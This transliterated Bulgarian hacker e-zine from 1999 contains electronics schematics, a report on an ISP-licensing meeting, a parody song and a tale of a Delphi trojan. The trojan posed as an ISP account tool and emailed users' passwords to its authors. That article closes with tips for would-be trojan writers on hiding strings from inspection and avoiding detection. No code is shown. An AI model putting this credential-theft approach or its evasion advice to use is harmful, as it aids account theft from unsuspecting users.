da zabraviame, che genialnostta na programistite i hakerite e bezkraina i
che te mogat da napraviat neveroiani neshta za da vi haknat i da se skriat.
Drug metod za sledene, koito e dosta po-truden e da si sledite INTERNET
trafika - dali se izprashtat pisma, koito ne se izprashtat ot vas ili dali
poniakoga po mrezhata ne se izprashta neshto, koeto ne bi triabvalo da se
izprashta v tozi moment. Osven tova triabva da nabliudavate vnimatelno dali
sistemata ne se durzhi stranno (da se bavi, da zabiva ili hard-diska da
presturgva postoianno /taka se hvashtat niakoi ot programite za sledene na
klaviaturata / i t.n.). Vnimavaite kogato si instalirate bezrazborno
softuer, osobeno ako e durpan ot INTERNET. Nikoga ne puskaite programi,
koito ste pridobili v rezultat na spam! Druga dobra, makar i nepriatna
strategia e ot vreme na vreme da si iztrivate WINDOWS-a i da go
preinstalirvate zaedno samo s programite, koito vi triabvat. Tova, kakto
znaem, ne e problem, ponezhe WINDOWS po princip na niakolko meseca se skapva
i preinstalirvaneto mu stava nalozhitelno.
V zakliuchenie bi moglo da se kazhe, che fisherite za karti sa mnogo moshtno
i efektivno sredstvo za dobivane na informacia za chuzhdi kreditni karti. Te
mogat da sa napisani po razlichni nachini i da rabotiat na razlichni
principi, no efektut e edin i susht - v kraina smetka vi otkradvat
kreditnata karta. Borbata sreshtu tiah e mnogo trudna, no vse pak
po-uiazvimi sa neopitnite potrebiteli. Problemut ne e v hakerite i
programistite, koito dobivat chuzhdi kreditni karti, a v sistemite za
razplashtania, koito sa se utvurdili v dneshno vreme.
[B.Red: MAMKA MU I PASKALADVIQ]
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#16ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Phone Line Filters Kuche
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Tazi statia se javjava kato dopylnenie na tazi na Stoiko i 1/2, vypreki che
pyrvonachalniat variant izleze okolo 4 pyti po-goljam. Povecheto shemki i
idei sa vzeti ot ~net-a, no ima i moi idei ( obryshtajte se kym tjah s
goliamo nedoverie ). Predvaritelno se izvinjavam ako statiata izglezhda
lamerska, no njakoi neshta bjaha neizvestni i na dosta opiten narod.
!!!VYZMOZHNO e da se povtarjam s Stoiko i 1/2 -ne e umishleno, prosto gledam
da ima njakva pylnota i izcherpatelnost na teksta!!!!
1. Predi modema. Systojanieto na mrezhata ot duplexnata kutia (ako ima
takava, ako li pyk njama - ot zhcata vyv vashia dom) do modema e izcjalo vyv
vashi ryce. S duplexnata kutia njama kakvo mnogo da se pravi, zashtoto tja e
plombirana ( ako ne e, edinstvenoto, koeto mozhe da napravite, e da
izshkurite kontaktnite pypki na reletata). Zhicata, otkydeto mozhete da ja
smenite, e naj dobre da e UTP (pone do smisyla na neekranirana usukana
dvojka) - tova estestveno ne znachi, che trjabva da izkurtite starata.
Obiknovenno zhicata, kojato stiga do 'kontakta' v stenata, si e kakvato
trijabva, i ne e nuzhno da se modificira. Ot stenata obache do modema e
naj-dobre da si usuchete edna (spomnjam si tel. tehnik, kato ni slagashe
MTG-to, kak sucheshe 1 chas 2 metra zhica - opredeleno ne e bilo sluchajno).
Btw MTG za neznaeshtite e microtelefonna garnitura - !!! kakvo li shte e
makro telefonnata garnitura!!! - telefonen aparat. Pisha go taka zashtoto e
po-kratko. Naistina ima razlika mezhdu usukanata samodelka na picha, i
zhicata ot modema mi. Drugia moment e vruzkite mezhdu zhicite - naj -
sigurno e s pojalnika, no e i naj dyrveno.
Po natatyk po pytja do modema sledva vyprosnoto MTG. Naj-dobre si e ako e
mushnata v dupkata na modema na kojato pishe "PHONE", no ne e zadulzhitelno
da e tochno taka, zashtoto:
pyrvo - njakoi telefoni (kato moja naprimer - za spravka mashinata e BTC, i
si ja drupnah ot BTK-to zaedno s edin terminal, kojto taka i ne uspjahme da
podkarame s edin (mnooogo) drugar(i) - zatova sym ubeden che ne e njakva
boza, a stabilno MTG....) imat usilvatel (ne SP-phone), razgledan e podoben
po-natatyk, kojto vnasja izvestna stabilnost na vruzkata;
vtoro - predstavete si, che imate poveche ot 1 telefon i PC-to vi e daleche
ot tjah, togava kakvo? Shte kupite 100 m zhica li? (za telefonite pone
njama nuzhda da ja suchete).
(Bel.Iron - 100m UTP Cat.5 (makar che za telefon sigurno i Cat.3 stiga)
struva kum $25... Ne e chak tolkova skupo, pri polozhenie, che tova sa 4
chifta:-)
Spasenieto e na vseki telefon posledovatelno da vkluchite dinistor, kato
naprimer KH102A - ruski e i H-to e N. :)), kato e orientiran po podhodjasht
nachin (ako ne stane (+)-T-D-(-), probvajte obratno (-)-T-D-(+). (za spravka
dinistorut e s 2 izvoda, prekysvate ednata zhica na telefona i go vryzvate
tam. Mozhe i da se mushne v samija telefon, no da se vnimava sys shtepsela
na mu :) ) . Ako se pak ne mozhete da namerite KH102A, mozhe da go
zamenite s shemichkata pokazana naj-dolu v teksta, kato tranzistorite sa
syotvetno 2T3850C i 2T3606C, a syprotivlenieto e 91 kilooma. Gore-dolu
(levo-desno) tova e za zhicite i telefonite.....
2. Tynkostite na modema. Tuk estestveno se stiga do edna dilema - ACP-to na
vyprosnia. Pri uzhasno loshi vruzki modema se zagrjava kato pechka,
zashtoto ACP-to redovno poluchava porcii visoko naprezhenie ot linijata (e,
ne tolkova visoko, che da grumne, vypreki che i takiva sluchai sym chuval),
koeto mozhe da se rezne s dve syprotivleniica ot okolo 100-200 oma vyrzani
posledovatelno na dvete zhici na modema (dve ot 100, ne edno ot 200), koeto
obache vodi i do po-kofti vruzka (no modema shte e cjal :) ).
Ta, pri njakoi modemi (predimno 56k) ima edna komandichka ATI11, kojato
pokazva statistika za poslednata osyshtestvena vryzka. V neja mogat da se
vidjat kakto normalnite raboti i nivo na predavania i priemania signal,
blizko i dalechno exo ( :-) ) i sredno nivo na shuma.
(Bel.Iron - Modemite za naeti linii sushto imat)
Vpechatlenie pravi nivoto na predavania signal, koeto pri njakoi modemi
mozhe da se regulira chrez registyr N91 (ATS91? ; ATS91=x&W0- za lameri), i
mozhe da e ot 6 do 15 (-dbm), kato naj-dobre e da e okolo 8. Za syzhalenie
tova e samo pri njakoi modemi, i vypreki che vsichki otgovarjat s OK . Ako
sled tova naistina registyryt se e promenil, znachi chastta s usilvatelite
ne e za vas.
Druga tynkost po nastrojkata na modema e registyr N10 (e, kojto go znae, da
prochete kvo pishe v nachaloto na statiata), kojto opredelja broja 1/10 sec.
da chaka modema predi da se izdropi ako njama noseshta chestota (B.Red:
wsustnost malko mi e stranno zasto e napsial N10, kato na wsichki modemi,
koito sym wivdal az e S10). (Bel.Iron - da, be, S10 si e...) Naj dobre e toj
da e v poradyka na 200-250. (kato kazah drop i se setih che njakoi modemi
dropat pri pretovarvane na ACP-to )...
3. Filtrite - koeto me nakara da napisha vsichkoto tova otgore (kato vidjah
statiite, koito naj-verojatno shte se publikuvat v PHM21, sreshnah tazi na
Stoiko i 1/2 za filtyr, i tyj kato mi se nalozhi i na men takvoz chudo,
reshih da ja napisha taz statia, no kakto se okaza, estestveno malkite
kamycheta (tochki 1 i 2) obyrnaha modema mi :)). Ako sled tova po-gore oshte
imate nuzhda ot filtyr i usilvatel chetete, inache i taka vi e dobre.
Shemite sa vzeti ot FIDO i predimno .ru site-ta , ima i edna moja
implementacia (poznajte koja). Predvaritelno se izvinjavam za ASCII
grafikite, no shte e brutalno da UUencodna i slozha tyk edni 50+kb kartinki.
Pri testvane naj-dobre da se probva s razmjana na poljarnostta na vhoda.
Vsichki kondenzatori sa pone 200 W, rezistorite 1/2 vata. Pochti vsichki
filtri imat za cel da filtrirat visokite chestoti (primerno ot ventilatora
na PC-to vi, koito se predavat po induktiven pyt) - naprimer pravi
vpechatlenie, che kondenzatorite sa predimno ot 0,15uF. Pri po-specialnite
shemi ima e dadeno i objasnenieto.
Filtyr No2 e probvan na ActionTec V90 i Acorp 336EMR i analogovo ATC.
Koftito e, che tezi filtri sa za visokochestotni signali, pri koeto pri
trakaneto ot reletata njama spasenie. Mozhe da se turi estestveno edna
bobina kym modema, no efekta shte si e syshyia, a i naj mnogo da si
izbushite ATC-to i da sedite bez i bez tova mizerni telefoni. Moite opiti za
takyv filtyr dovedoha samo do blokiral telefon..
Kakto kaza EXo "Kato gi navyrzha sichkite i se poluchi edna boza, kogo da
psuvam?" - njama koj, zashtoto trq'a da se vryzvat samo edin po edin,
eventualno s usilvatela. No vypreki tova No2 se durzheshe stabilno s mojto
modemche, sled nego beshe No4.
Eto gi i schemite:
o--/\/\/\---o---/\/\/\--o
L1 | L1 L1 = 10 navivki, PEL 0.1 mm diametyr,
--- radius na navivkite 3 mm - 2 broja
Vhod C1 --- Izhod C1 = 0,15 uF
|
| Otrjazva visokochestotnite signali.
o-----------o-----------o
- = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -
o----###---o --->|------o
R1 | D1 R1= 360 oma
--- C1 = 0.15 uF
Vhod --- C1 Izhod D1 = D226
R1 | D1
o----###---o----|<------o Tova e mozhe bi naj - dobriq filtyr.
- = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -
o Vhod o
| C1 R1 R2 R3 | C1=1.2 uF, R1, R2 - potenciometri!!
|-----||----###----###----###----| R1=10 kilooma R2 = 2 kilooma R3=100 oma
| '-/ '-/ | R1 i R2 se izpolzvat za nastroika
o Izhod o (pochva se ot max. syprotivlenie i
postepenno se namaljava)
Osobenoto pri tozi filtyr e,che toj ne
filtrira po-visokite i niski chestoti,
a prekarva prez R1,2,3 signala ( vkl. i
noseshtite). Ot koeto, predpolagam,
mozhe da si napravite syotvetnite
izvodi (mozhete dori i ATC-to si da
izbushite ).
- = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -
o-----------o-------o----------o Eba mi se majkata s tova ASCII
| # ( x - njama vryzka)
--- R3#
Vhod C1--- # Izhod(kvo drugo) C1=.5uF
| | C2=100nF
|---####--o--####-x--------| R1=100 oma
| R1 R1| | R3=5.6K
o-o----------||----o-||-----o-o
C2 C2
- = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -
Tyka sledva variant s transformatori - ADVANCED USERS ONLY ( ne sym go
probval dazhe) s RC sa oznacheni paralelno vyrzani kondenzator i rezistor .
* sa si sym. vhodove na traf.
* Tr11 Tr21 *
o---\/\/\/---RC----\/\/\/---o |-||--|
Vh. ====== ====== Izh. RC = -o o-
o---/\/\/\---RC----/\/\/\---o |-###-|
* Tr12 * Tr22
C=.1 uF
R=10 - 60 oma i zaviselo ot razst. do ATC-to (az li da vi objasnjavam che
tova se pravi s putenciome(ty)r :))
Tr21,Tr22 = 30-50 navivki pak edna do druga.
Za Tr-tata se izpolzva PEL s diametyr .4 .5 mm ( PEL04 napr). Navivat se na
feriten cilindyr simetrichno za Tr1 i asimetrichno za Tr2. Tr11,Tr12 =
7navivki edna do druga!
V tozi model, Tr1 e filtyr za visokite, a Tr2 se ima za pasiven usilvatel.
- = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -
Tolkova za filtrite, smjatam, che tezi sa dostatychni ( izmuchih se s
ASCII-to (10 pyt), a i za usilvatelite trjaa ASCII :(( ).
4. Biseryt-usilvatel-1 broj ( pyrvonachalno bjaha dva, no smetnah za
po-dobre vtoria da ne go slagam tyk zashtoto e po-kooofti ot tozi, a i e s
60V zahranvane, i razlikata e samo v tova che vmesto OU-to ima tranzistor.a
i ASCII-to..). Vryzva se paralelno s modema i se gasi ako ne se upotrebjava,
zashtoto izdava shum po linijata. Usilva okolo 1-2 pyti. Eto ja i
shemata,kato v neja mozhe da se zamesti 555UD2to s proizvolen usilvatel.
Shemata iska simetrichno zahranvane +/- 15 V :
L1 ______ R1 /--|
|------o---o-----------o---------/\/\/\----###-o-, D1 - Cener 20 V
| | | | i(5) | R1=22k R3=160 |
| --- # '--------|'. o(10) | R2=33k R4=1.6k |oma
| D1 ^ # R2 /i(4) |ou,'------------o L1=200-400 uH-se edno
| / \ # --------|,' | | C1=0,043 uF
| T | | | | | C2=180 nF
| '---o--->GND | (3)| |(12) | C3=4 uF
| D1 R3 | '||' | C4=20 uF 20V (POLJAREN)
o--|<---o---####--------o C2 |
| | | |
| | | |
| | | R4 |
--- --- '---o-###-o--------------'
--- C3 --- C3 '-||--'
| | C1 Chislata v skobite sa izvodite na
| | C4 OU. + 15V ->11-to ;-15V->6 krache
| o---||--->GND S R1 - koeficient na
| | + usilvane
|Lineee | OU=555UD2
Pri tozi variant nastrojkata e slednata: Pri vdignata slushalka na MTG-to R1
se namaljava do dupka i se gleda ima li signal na izhoda(krache 10) - s
osciloskop naj-dobre. Postepenno R1 se uvelichava do izchezvane na signala,
i posle s oshte 15% otgore se uvelichava. ( Ako njamate osciloskop tova se
pravi kato vkluchite oste edin telefon i sluhtite tam. Za zahranvaneto njama
da pisha shtoto shte se psihiram ot tolkova ASCII psevdo~ -ta, to ne e
problem.
,----------,
T1 | | T2
(A)---(E)(B)(C)--(B)(C)(E)---(K) - Tova e zamestvashtata shema za dinistor.
| |
'--####----'
R
Ahhh, kolko sym dovolen che svyrshih - ne e istina. Mnogo sym dovolen, che
ja skysih napolovina, i vypreki tova mi se vizhda goljama. Dazhe kato se
zamislja kolko li narod shte se jurne na pravi usilvatela ili onova s tr.
samodelki... shto li ne oda da pia edna studena... bira. Da ne govorim za
Stoiko i 1/2, kojto sigurno shte me psue za konkurenciata. i t.n. t.n...
Losha rabota. Hmmm v PHM#1 li pisheshe "Zavyrsheno pod zvucite na
2nd_pm.s3m?"-Tova syshto. Samo datata e razlichna.
Edno ZLO_PSE.
/podpis i pechat/
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#17ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Trojan Horse History Solar Eclipse
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
I. Introduction
W tazi statiq shte stane duma za otdawna otminali wremena. Za wremenata,
kogato Internet nawlizashe w Bulgaria. Za wremenata, kogato BBS-ite oshte
bqha na moda. Za wremenata, kogato CIS beshe osnowniqt provider na Internet
za mladevtta. Koito e bil tam - znae. Koito ne e - ne e izpusnal mnogo :-)
II. The Problem
Po wremeto, za koeto shte stane wupros, po-tochno esenta na 1997, problemut
s Internet dostupa beshe mnogo seriozen. Bulgarskite ISP-ta iskaha naprawo
neweroqtni sumi, naprimer Digsys iskaha 5 lv/KB, po wremeto kogato edin
dolar beshe 60lv. CIS puk beshe bawen i dawashe mnogo zaeto. Polovenieto
beshe tevko.
Towa nakara grupa biwshi BBS-adjii da sednat i da zapochnat da si mislqt nad
wuprosa "Kak da hwanem malko accounti za nqkoi Bulgarski provider?" Edno
ot resheniqta beshe slednoto: Dostawchikut TechnoLink (po towa wreme lyubim
na wsichki zaradi wisokata si skorost) imashe na webstranicata si 2 CGI-ta.
Ednoto dawashe dostup do dannite na usera (izpolzwani chasowe, etc). Drugoto
beshe web-interface kum finger, pokazwashto imenata na wsichki lognati w
momenta useri. Ne beshe tolkowa trudno da si zapishesh imenata ot fingera i
posle da gi probwash wsichkite w CGI-to za statistikata. Namiraha se useri,
chiqto parola suwpadashe s username-a. Za suvalenie ne bqha mnogo. Trqbwashe
da se izmisli nqkakuw po-efektiwen metod.
III. The Idea
Togawa edin ot BBS-adjiite se seti: troqnski kon! Ne trqbwa da se zabrawq,
che po towa wreme nqmashe BO, nqmashe NetBus, nqmashe nishto. Trojanskite
kone ne bqha razprostraneni i az lichno nikoga ne bqh chuwal nqkoi da
izpolzwa trojanski kon za neshto drugo oswen formatirane na harda na
vertwata.
Taka che ideqta za izpolzwane na kon za wzimane (otkradwane?) na parolata na
nqkoi user beshe neshto nowo. Za suvalenie nikoi ot nas ne znaeshe kak
tochno da stane towa. Poznaniqta ni za prorgamirane pod Windows bqha chestno
kazano skromni. Edna ot ideite beshe po nqkakuw nachin da se izdropi
wruzkata, i sled towa s keyboard capture da se hwane parolata, kogato usera
se reconnectne. Wruzkata trqbwashe da bude izdropena narochno, zashtoto
nqmahme nikakwa ideq kak da pusnem keyboard capture process, koito da ne se
zatwori, kogato usera zatwori programata w koqto beshe konq. Taka che usera
trqbwa da poluchi programata po email, da q pusne, tq da go izdropi i toi da
se reconnectne predi da e zatoworil programata.
Tazi ideq beshe othwurlena poradi ochewidnata ni nesposobnost da q
realizirame. Sledwashtata ideq beshe mnogo po-dobra: zashto da si prawim
truda da lowim parolata s keyboard capture, sled kato movem nakarame usera
sam da q wuwede. Taka se rodi trojanskiq kon TLinkInf, kazano s drugi dumi
"Techno-Link Info Center". Ideqta beshe da se napishe front-end za
web-stranicata na Techno-Link, dawashta informaciq za accountite. Nashata
programa shteshe da pita usera za ime i parola, da se connectwa kum
www.techno-link.com, da simulira submitwaneto na imeto i parolata prez
browser, da parse-wa web stranicata s rezultatite i da pokazwa tezi
rezultati na ekrana. Sushto taka imeto i parolata shtqha da budat
izprashtani po email do awtorite (towa estestweno ne beshe opisano w
dokumentaciqta).
IV. The Implementation
Trojanskiq kon beshe napisan na Delphi. Sega me shte me e sram da pisha na
Delphi, no togawa pishehme na kakwoto imahme pod ruka i kakwoto movehme.
Ne movete da si predstawite kolko mnogo neshta nauchihme, dokato pisahme
konq. Koito kazwa che hackerstwaneto nqma realni polzi, greshi. Samo za
nqkolko sedmici, bez da imam nikakwi predishni poznaniq, nauchih pochti
naizust HTTP protokola, SMTP protokola, osnowoite na socket programiraneto i
IP addressa na Techno-Link. Oshte togawa stignah do izwoda che cheteneto na
RFC-ta bez da znaesh nishto po-wurposa e mnogo muchitelno. I dosega ne sum
si promenil mnenieto.
Sourca se sustoi ot 3 unita - MainUnit, AboutUnit i HelpUnit. AboutUnit-a i
HelpUnit-a se griveha za pokazwaneto na ekrana na About i Help boxowete.
Realnata rabota se wursheshe w MainUnit.
Konqt beshe dosta izpipan na wunshen wid: imashe gotini butoni, imashe
hubawa icona, dori imashe logo. Pri distribuciqta mu bqhme napisali i
README.TXT. Smqtam che towa doprinese mnogo za uspeha mu, zashtoto osnowniq
problem pri pisaneto na konete e kak da nakarash userite da ti powqrwat.
Osobeno kogato iskash ot tqh da si napishat imeto i parolata.
Nqkolko interesni osobenosti: Wsichkite stringowe w konq bqha kodirani. Towa
e dobra ideq za predpazwane ot useri, koito shte reshat da poglednat faila s
hex editor predi da go pusnat. Ne wseki shte se podluve, no wse pak ne e
izlishno.
Za suvalenie Deplhi dobawq w exe-to imenata na wsichki klasowe, koito se
izpolzwat. A w konq imashe klas SMTPClient, s metodi SMTPClientDisconnect,
SMTPClientConnect i t.n. I wsichko towa se wivda wuw exe faila. Poradi lipsa
na opit, ne se bqhme setili da poglednem exe-to predi da go izpratim, taka
che smisula na kodiranite stringowe se zagubi.
Drug primer za compilator, koito puha neshta w exo-to, koito ne e hubawo da
sa tam, e lcc-win32. Pri linkwaneto na izpulnimiq fila pochti winagi w
izpulnimiq file popada chast ot sourca. Towa izobshto ne e hubawo.
Predpolagam che linkera izpolzwa pamet, kudeto predi se e namiral source,
i ne q izchistwa. Kakto i da e, poukata e che winagi trqbwa da si poglednete
konq s hex-editor, predi da go distributirate.
Sushto taka shte wi posuwetwam da kodirate i towa, koeto izprashtate. Nqma
nishto po-tupo ot towa, nqkoi da hwane konq wi, nad koito ste se potili w
produlvenie na meseci, da hwane purwiq popadnal mu hex editor i da smeni
email-a, na koito se poluchawat rezultatite. Ako izpolzwate hex editor, move
da ste sigurni che rezultatite shte mogat da se izpolzwat samo ot was (i ot
horata, razbili kodiraneto wi)
V. The Source
Sourcut se namira w faila tlinkinf.zip, razprostranqwan zaedno s phm21. Tam
sushto taka se namira faila README.TXT, koito beshe attachnat kum konq.
Dobawil sum i tlinkinf.exe - kompilirana wersiq na trojaneca. Leko sum
modificiral exe-to, taka che da ne move da se izpolzwa za realni celi, no
sourcut e pulen.
VI. The Bitter End of the Story
Naj-setne konqt beshe gotow. Poluchi se poweche ot 300KB zip archiv.
Izpratihme go kato email attachment i zapochnahme da chakame rezultati. Samo
za dwa dni, 30 accounta se bqha hwanali, izpulwajki ni s radost, gordost i
obich kum rodinata i rodnite ISP-ta. No radostta ni beshe kratka. Za
suvalenie bqhme naprawili tipichnata greshka na nachinaeshtiq hacker:
prekalena lakomiq. Trojaneca beshe izpraten do WSICHKI useri na techno-link.
Ne do edin, ne do 10, a do pulniq userlist. Razbira se, oshte na sledwashtiq
den admina na Techno-Link izprati email do wsichki useri, sudurvasht
slednite dumi (priblizitelno): "Programata TLinkInf izprashta parolata wi na
hakerski address. Ako ste q polzwali, smenete si parolata". Do nqkolko dni
wsichkite ni accounti bqha grumnali.
VII. Some Advice
Eto i nqkolko suweta kum nachinaeshtite konewudi.
1) Ne izpolzwajte Delphi
2) Ne budete lakomi - ne izprashtajte konq si do 1000 dushi.
3) Ima useri, po glupawi ot was (pochti wsichki)
4) Ima sysadmini, po-umni ot was (no ne wsichki)
5) Chetete RFC-ta.
6) Izpolzwajte kodira na stringowete i izprashtaniq email.
7) Ne budete lakomi - towa weche go kazah, no e mnogo wavno.
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#18ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Otzwuk ot srestata s KPD w NDK EXo
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Koj razbral, koj ne razbral, na 14 Septemwri 1999-ta w zala 8 na NDK se
prowede sresta s KPD i DKD, za da se obsuvda licenziraneto. Tuk sum wi
predstawil nakratko wpechatleniqta si ot kazanoto po wreme na diskusiqta. Na
srestata prisustwaha kakto BTK-ari i predstawiteli na ISP-tata, taka i razni
neorientirani tipowe (kato men da rechem ;) i edno kilo vurnalisti, na koito
qwno ne im beshe qsno kude otiwat i kakwo trqwba da prawqt. Primer:
nqkakakwa reporterka ot w-k Trud, koqto malko predi da wlqza smelo me
zapita: "Abe razbrah za nqkakwo hakersko sybirane...(!) .. towa li e
mqstoto?", pri koeto weche suvalqwah, che sum q poglednal, zastoto me luhna
powej, napomnqsht na dolnoprobna mente-rakiq. Veni Markowski puk ot swoq
strana sigurno se e zapechatal na pone 50-tina foto-lenti, tyj kato tiq
tipowe ot presata si schupiha prustite da go strakat (osobeno w momenta,
kogato se poqwi w zalata s edna "licenzirana" druvinka, okowana w beleznici
:)).
Dnewniqt red na seminara beshe sledniq: Intro (nqkuw shibalanko), sled nego
nqkuw shef w KPD gowori za KPD (beshe dosta zaspal i edwam mu se razbirashe
kakwo prikazwa), sled towa edin tip ot DKD (kojto qwno se barashe za golqm
awtoritet) se izkaza i naj-nakraq beshe diskusiqta, koqto wsustnost beshe
naj-interesnata chast ot cqloto party.
Purwri pred mikrofona, protiwno na wsichki ochakwaniq, ne beshe Veni, a
nqkakuw gospodin, chieto ime ne pomnq. Oste sled purwite zadadeni ot nego
wuprosi obache na wsichki w zalata (wkl. i na smeshnite predstawiteli na
presata) im stana qsno, che ste byde otgowarqno samo na wuprosi, na koito
move da se otgowori dostatuchno uklonchiwo, che da ne stane qsno kakwo
tochno e kazano. Zapochnaha burni prepirni, koito na momenti bqha podkrepqni
s brilqntni iuridicheski ulowki i ot dwete strani. Citiraha se
zakonodatelstwata na powecheto ewropejski strani i se dawaha primeri ot
prowedeni prouchwaniq na obstestwenoto mnenie (nito edno ot tqh ne be delo
na KPD/DKD/BTC).
Nqkoi ot horata, koito zadadoha wyprosi i/ili izkazaha mnenie, bqha: Boris
Basmadview (Bulnet), Teodor Zahow (Spectrum Net), g-n Zaprqnow (Orbitel),
Dragomir Slavov (DigSys), Veni Markovski, Dimiter Ganchev i dr. Nito edin ot
tqh ne se izkaza polovitelno za licenziqta.
Tuvnoto obache e, che na sbornoto mqsto (popa), koeto trqwbashe da byde
nachalo na swoeobrazna mini procesiq-protest srestu licenziraneto, dojdoha
twurde malko hora, wypreki che sybitieto be obqweno publichno na dosta mesta
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#19ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Lie Detector Stoiko & 1/2
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
S tazi statiq sym principno nesylglasen: chowek move da se izpoti ot chisto
pritesnenie, naprimer kato e obwinen nesprawedliwo, taka che towa ne
igrae....
Iskali vi se vinagi da znaete istinata.Da razbirase.No v choveshkiat mozyk e
zalojeno edno neshto deto se kazva lyja.Losha rabota.No s ostroistvoto
koeto shte razgledame se slaga krai na toia choveshki byg.E poniakoga e
xybavo da se lyje no ako ni lyjat nas e losho.Ta tva ostroistvo moge da se
prilaga vyrxy:
- xora
- myje
- jeni
Ne deistva vyrxy:
- vsiakykvi jivotni i xora s kozina.
Zashto shte razberete kato vi opisha deistvieto da detektora. Prilogenieto
na tva neshto e goliamo.Moje da se izraboti kompaktno tyi kato za zaxranvane
se izpolzva bateria ot 9V.Snachi ako se samniavate v niakoi my vikate: "Abe
ia tyri tva neshto na pryscheto da vidim".
Ili moje da go vgradite v niakoi stol obache toia deto siada triabva da e s
ky- si pantaloni ili s mini pola (nai dobre) i vie si montirate visyalnata
chast do biyaroto ili drygo skrito miasto ot kydeto shte xvyrliate po edno
oko koga vi lyje onia pred vas.
Eto ia i sxemata: (malko neskoposano izlena ama ...)
/
_______________________________./ .------. +9V
| ___ | K
| | |R2 |
| | |3,3koma ____ ___
| --- - / \ + | |
00000--------- |-------| 1mA | --->| |R4 1kom
T |/ | \ ____ / | | |
00000--|||||------| | | ---
R1 | |\> | /> | |
220koma | | |__|-/---|___| |
| | | |/----| |
_____ | |__/ ___ R5
C1 _____ | R3 1kom | | 220oma
0.1 mikroF | | | |
| | ---
|______|______________________|_____________. 0
|
---
T - tranzistor BC107
Ta kak deistvo tva chydo.Vsyshnost stava dyma za obiknoveno izmervane na
koj- no to syprotilvenie.Normalno syxata choveshka koja ne provejda tok
toest tia e s mnogo goliamo syprotivlenie.chistata voda syshto e mnoho losh
provodnik. I taka kogato chovek lyje (a tva chesto se slychva pri
polochavaneto na chyjdi poroli) toi se vylnyva i izpotiava.A choveshkata pot
sydyrja soli i predsta- vliava malko syprotivlenie za toka.Sledovatelno po
kojnoto syprotivlenie moje da se vidi koga chovek lyje.
Yznachenia v sxemata:
- Tva krygloto (ne e tolkova kryglo ama...) e mili amper metyr.Po nego se
otcita rezyltata.
- R4 i R3 - promenlivi rezistori.
- 00000 i 00000 dve metalni plastini koito se dopirat do kojata.
- K - klych za vkluchvane na zaxranvaneto.
Pri izmervane (predi vyprosa) ystroistvoto se nulira s R4, a pri vtoroto
izmervane sled vyprosa se otchita promianata na kojnoto syprotivlenie. I ako
e promeneno znachi lyjeeeeeeeee. I xop stava s kysi krachka. Chystvitelnosta
na detektora se opredelia s R3. Dvete plastini mogat da se pomestiat v
grivna taka che da e po odobno slaganeto. Tova e ne e slojno za
naprava.Nadiavam se che tova ystroistvo shte vi vlezne v rabota!
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#20ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Blue in the Dark Xoduz
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
"Blue In The Dark" - v1.0 beta 2
or
Fears in the dark 8 years later
=================================
Music: Iron Maiden '91
Lyrics: XoDuZ '99
=================================
1.
I am a man who sits alone
And when I'm watching Windows' blow,
At night or scrolling through tabs,
When the screen begins to change
I sometimes feel a little strange -
A little SUXious when it's dark.
Refrain:
Blue in the dark, blue in the dark ...
I have the constant fear that crash is always near.
Blue in the dark, blue in the dark ...
I have the phobia that other bug is always there.
2.
Have you run your pointer down the wall,
And have you felt your Windows'll blow,
When you're searching for the "Start" ?
Sometimes when you're scared to take a look
at the corner of the room
you've sensed that Bill Gates' watching you ?
Have you ever been alone at night,
Thought you've runned the new "Crash Guard",
A look around and the icon's there ?
A when you press the button's face,
You find it hard to look again,
Because you're sure that Blue Screen's there ?
Refrain:...
3. Watching Linux win's the night before,
Debating Windows and its blows,
The unknown troubles on your mind.
Maybe Bill Gates is playing tricks,
You sense, and suddenly eyes fix
on exeption message from behind.
Refrain:...
When I'm watching Windows' blow
I am the man who sits alone...
=================================
>> EOA <<
